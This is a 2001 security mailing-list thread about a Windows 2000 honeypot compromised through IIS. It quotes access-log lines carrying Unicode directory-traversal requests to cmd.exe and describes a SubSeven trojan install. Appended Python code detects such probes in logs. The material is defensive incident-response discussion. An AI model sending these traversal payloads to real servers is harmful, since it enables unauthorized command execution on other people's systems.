RE: Hacked NT/2K box

From: Moran (Moran@tiemiddleeast.com)
Date: 07/24/01


From: "Moran" <Moran@tiemiddleeast.com>
To: <keydet89@yahoo.com>, <focus-ms@securityfocus.com>
Subject: RE: Hacked NT/2K box
Date: Tue, 24 Jul 2001 01:16:28 -0700
Message-ID: <AB4D1FD359C68949A0C64CD2BE4F4828070AE6@tie-main.office.tie-me.com>

Hi,
A while ago I set up some honeypots.
One was Linux and the other Windows 2000 Advanced Server.

No one tried to hack the Linux one (bad luck, I guess :)).

But the Windows 2000 one, well, it took like 3 or 4 hours till someone found it.

They got into the server by running a simple script that checked for exploits;
from the logs the script looks like this:

211.152.241.1 - - [13/Jul/2001:08:11:08 +0300] "GET x HTTP/1.0" 400 281
211.152.241.1 - - [13/Jul/2001:08:11:14 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:25 +0300] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:26 +0300] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:28 +0300] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:33 +0300] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
211.152.241.1 - - [13/Jul/2001:08:11:35 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:36 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
211.152.241.1 - - [13/Jul/2001:08:11:37 +0300] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256

and so on, till they get something that works.

He copied cmd.exe to inetpub and I guess he got a shell, because
what he did was install a patch from the Microsoft site; after that
he installed a Trojan, SubSeven 2000, and logged off.
The day after, he connected using the trojan he had put there, and from there connected
to other computers. I guess he had more servers with trojans and just made
a lot of connections before going to hack another system so he can't be
traced.

After that I shut off the server.

Moran.

-----Original Message-----
From: keydet89@yahoo.com [mailto:keydet89@yahoo.com]
Sent: Monday, July 23, 2001 4:15 AM
To: focus-ms@securityfocus.com
Subject: Hacked NT/2K box

When I was at BlackHat and DefCon recently, I was
having discussions with some folks regarding an
article I'd written on NT incident response. I'd
written the article along the same lines as a
Linux or Solaris incident response procedure, but
with NT in mind.

The discussion centered around this...having your
hands on an NT or 2K box that was 'hacked' in much
the same way as a Linux or Solaris box. I wasn't
able to find anyone who has seen such a thing. I
work on an all-NT infrastructure, with 2K systems
providing web hosting in the data center. Many
others have similar infrastructures.

When a Linux box is 'hacked' (generally speaking,
of course), the attacker puts on a rootkit and
uses that box as a step-off point to attack other systems.
This isn't something you see with NT. The
'sadmind/IIS' (poisonbox) worm is another good
example.

So, my question to the group is this...has anyone
seen a 'hacked' NT or 2K box? If so, what did you
find out about it? What technique did the attacker
use? How did they establish a foothold on the box,
what tools did they load, and what did they do
from there? I've already read through JD Glaser's
BlackHat presentation from '99.

It's been said that NT boxes are easy to hack b/c
of vulnerabilities to services, but not easy to
hack b/c you can't 'get on the box' the same way
you can with Linux or Solaris.

Input is appreciated.
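The probes in Moran's log above are all variants of one trick: a `../` whose separator is written as a percent-encoded two-byte UTF-8 sequence, which the server decoded after its path check had already run. As an added example that is not part of the original thread, the Python below parses lines in that log format, decodes the two-byte escapes to show which separator character each one stands for, and reports per source IP how many such requests were rejected (400/404) versus actually served (200). The sample log lines, the documentation-range addresses and the single 200 response are constructed here for illustration; the original logs contain only 400 and 404 responses.

```python
import re
from collections import defaultdict

# Constructed sample log, modelled on the entries quoted in the post above.
# 203.0.113.5 and 198.51.100.7 are placeholder addresses, and the 200 on the
# fourth line is invented to show what a served traversal request looks like.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jul/2001:08:11:08 +0300] "GET x HTTP/1.0" 400 281
203.0.113.5 - - [13/Jul/2001:08:11:14 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 256
203.0.113.5 - - [13/Jul/2001:08:11:25 +0300] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 240
203.0.113.5 - - [13/Jul/2001:08:11:40 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1457
198.51.100.7 - - [13/Jul/2001:08:12:01 +0300] "GET /index.html HTTP/1.0" 200 3021
"""

# NCSA common log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
# "..": followed by a percent-encoded two-byte sequence (..%c0%af, ..%c1%9c, ..%c1%pc ...)
TRAVERSAL_RE = re.compile(r'\.\.(%[0-9a-f]{2}%[0-9a-z]{2})', re.IGNORECASE)
CMD_RE = re.compile(r'cmd\.exe', re.IGNORECASE)


def decode_overlong(seq):
    """Decode a '%xx%yy' pair as a two-byte UTF-8 sequence.

    Returns the ASCII character it is an overlong encoding of, or None when
    the pair is not valid hex, not a lead+continuation pair, or encodes a
    code point that legitimately needs two bytes.  %c0%af -> '/', %c1%9c -> '\\'.
    """
    m = re.fullmatch(r'%([0-9a-fA-F]{2})%([0-9a-fA-F]{2})', seq)
    if not m:
        return None
    b1, b2 = int(m.group(1), 16), int(m.group(2), 16)
    # 110xxxxx lead byte followed by a 10xxxxxx continuation byte
    if b1 & 0xE0 != 0xC0 or b2 & 0xC0 != 0x80:
        return None
    cp = ((b1 & 0x1F) << 6) | (b2 & 0x3F)
    # anything below 0x80 should have been a single byte: overlong form
    return chr(cp) if cp < 0x80 else None


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def classify(entry):
    """Return 'probe', 'success' or None for a parsed entry.

    400: the server rejected the escape as malformed.  404: it decoded the
    path but found nothing.  200 to such a path: the request was served,
    which for a cmd.exe target means the command ran.
    """
    path = entry['path']
    if not (TRAVERSAL_RE.search(path) or CMD_RE.search(path)):
        return None
    return 'success' if entry['status'] == 200 else 'probe'


def summarize(lines):
    """Per-IP counts of rejected probes, served requests, and decoded separators."""
    report = defaultdict(lambda: {'probe': 0, 'success': 0,
                                  'served': [], 'separators': set()})
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is None:
            continue
        r = report[entry['ip']]
        r[verdict] += 1
        if verdict == 'success':
            r['served'].append(entry['path'])
        for seq in TRAVERSAL_RE.findall(entry['path']):
            ch = decode_overlong(seq)
            if ch is not None:
                r['separators'].add(ch)
    return dict(report)


if __name__ == '__main__':
    for ip, r in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {r['probe']} rejected, {r['success']} served, "
              f"separators={sorted(r['separators'])}, served={r['served']}")
```

The useful signal for a defender is not the 400s and 404s, which every scanner generates in bulk, but a 200 to any path that references `cmd.exe` or contains an encoded `..`; in the sample data only the constructed fourth line trips that condition, and `decode_overlong` shows why `%c0%af` and `%c1%9c` reach the filesystem as `/` and `\`.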


